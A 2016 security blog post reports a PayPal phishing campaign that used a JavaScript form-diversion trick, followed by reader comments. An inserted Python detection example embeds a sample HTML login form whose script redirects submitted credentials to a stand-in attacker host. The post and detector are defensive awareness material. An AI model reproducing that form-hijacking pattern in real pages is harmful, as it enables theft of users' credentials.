Think hovering your mouse over the URL will save you? Think again!

Phishers using JavaScript redirect to steal PayPal credentials

Regular readers are familiar with our ongoing coverage of phishing attacks.

Recently, we reported on an Apple ID SMS-based phishing scam, and described how tax-related phishing attacks surged by 400 percent this year.


The continued success of these and other phishing campaigns reveals a persistent deficit of security awareness among users. Indeed, as we shared in an article earlier in 2016, Tripwire found that more than half (52 percent) of respondents to a survey conducted at RSA were “not confident” in their ability to spot a phishing attack.

That’s troubling news. And as attacks continue to grow in sophistication, it’ll only get harder to spot a phish.

Case in point: phishers are now using a hidden JavaScript redirect method to steal unsuspecting PayPal users’ login information.

On Monday, UK malware researcher @dvk01uk came across the phishing campaign.

Peter Arntz of Malwarebytes explains that fraudsters in these particular attacks are using JavaScript to send users to a legitimate PayPal site while sending their credentials to a different domain that hosts a phishing page:

“The JavaScript runs as soon as the page (HTML attachment) is loaded and intercepts all posts to and diverts them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.”

This sophisticated technique negates a common anti-phishing tactic: hovering over a URL to confirm it points to where you would expect it to point.
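The hover check fails because the form's visible `action` and the destination the script actually submits to are two different things. Below is an added detection example (not code from the article or from the researchers quoted here) that inspects an HTML attachment for exactly that mismatch: a form that appears to post to the trusted host while inline script hooks the submission or references another host. The sample attachment, host names and the `analyse_attachment` function are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mirroring the structure described in the article: a login form
# that appears to post to PayPal, plus a script that diverts the submission elsewhere.
SAMPLE_ATTACHMENT = """
<html><body>
<form id="login" action="https://www.paypal.com/signin" method="post">
  <input name="email"><input name="password" type="password">
  <button>Log In</button>
</form>
<script>
  document.getElementById("login").onsubmit = function () {
    this.action = "http://attacker-placeholder.invalid/collect.php";
  };
</script>
</body></html>
"""

class _Collector(HTMLParser):
    """Collect every <form action> and the body of every inline <script>."""
    def __init__(self):
        super().__init__()
        self.form_actions, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# Patterns that hook or rewrite a form submission from script.
HOOK_RE = re.compile(r"\.action\s*=|onsubmit|addEventListener\(\s*['\"]submit", re.I)

def analyse_attachment(html, trusted_host="www.paypal.com"):
    """Return findings explaining why the HTML looks like a form-diverting phish."""
    c = _Collector(); c.feed(html)
    script = "\n".join(c.scripts)
    visible_hosts = {urlparse(u).hostname for u in c.form_actions if u}
    script_hosts = {urlparse(u).hostname for u in URL_RE.findall(script)}
    findings = []
    if visible_hosts and visible_hosts <= {trusted_host} and HOOK_RE.search(script):
        findings.append("form posts to trusted host but script hooks the submission")
    findings += [f"script references untrusted host: {h}" for h in sorted(script_hosts - {trusted_host})]
    return findings
```

Run it over a suspicious `.html` attachment before anyone opens it; an empty list means no diversion pattern was found, not that the file is safe.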

Fortunately, users can protect themselves against this phishing technique, though for how long remains to be seen. The malware researcher @dvk01uk expands upon this point in a blog post:

“The only saving grace with this particular phishing attack is that the phishing page is an HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give to NOT open any attachments to emails and definitely do not fill in HTML form attachments should protect you. But once a phisher puts this onto a website with a plausible & believable URL, then all bets are off and it will be almost impossible to detect the phish. This is very worrying.”

Fortunately, PayPal offers users the ability to enable two-step verification, which will help protect their accounts even in the event someone compromises users’ passwords.



4 Responses

  1. drsolly

    June 15, 2016 at 8:58 pm

    I’ve been using a non-html mail client since 1995.

  2. dqfozzie

    June 15, 2016 at 11:34 pm

    PayPal are their own worst enemy when it comes to phishing. They proclaim they are anti-phishing but have links on their ‘Your … statement is available’ emails that look suspicious. I check them out because I’m a security professional but the average person either tires of this process or doesn’t know how to, to begin with. Their users have no confidence that they are safe. Best practice is to give no link at all and get the user to go to a known safe bookmark or type it in from scratch. I’ve emailed them. Guess how much response I got :-(

  3. vooboobolly

    June 16, 2016 at 1:32 am

    Paypal 2FA is not available in all countries! Why not?

  4. graphicequaliser

    June 16, 2016 at 12:21 pm

    I always log in to the site by typing the URL, check the SSL padlock before I log in, and then log in to see a statement or whatever. I have the motto, “If something is running on your computer that is not part of the OS, then you really ought to know what it does and why it is running.” Also, “Don’t install something because you’ve been prompted to. Only install stuff you want.” That, and MJ Registry Watcher have kept me safe for many years!
